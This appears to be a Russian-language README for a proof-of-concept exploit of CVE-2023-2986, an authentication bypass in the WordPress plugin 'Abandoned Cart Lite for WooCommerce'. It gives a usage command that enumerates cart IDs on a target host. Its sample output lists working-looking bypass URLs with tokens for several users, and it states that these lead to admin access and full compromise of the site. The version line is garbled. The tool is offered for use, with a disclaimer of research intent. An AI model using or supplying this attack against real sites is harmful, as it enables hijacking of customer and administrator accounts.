
Proof of Concept для уязвимости CVE-2023-2986 в плагине 'Abandoned Cart Lite for WooCommerce' для WordPress
Доказательство концепции уязвимости CVE-2023-2986 в плагине 'Abandoned Cart Lite для WooCommerce' на WordPress.
version <= 5.14.2version <= 5.15.15.15.05.15.2Считалось, что версия 5.15.0 исправляет проблему, но я обнаружил, что она не была полностью исправлена, и то же самое было обновлено. Таким образом, фактическая исправленная версия — 5.15.2.
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
Ввод URL в браузере предоставит вам доступ к учетной записи соответствующего пользователя. Если сам администратор WordPress имеет запись, это даст доступ к консоли администратора, что приведет к полной компрометации сервера WordPress.
Это доказательство концепции (PoC) было создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для атак на системы, кроме случаев явного разрешения. Автор не несет ответственности за любое неправомерное использование PoC. Используйте ответственно.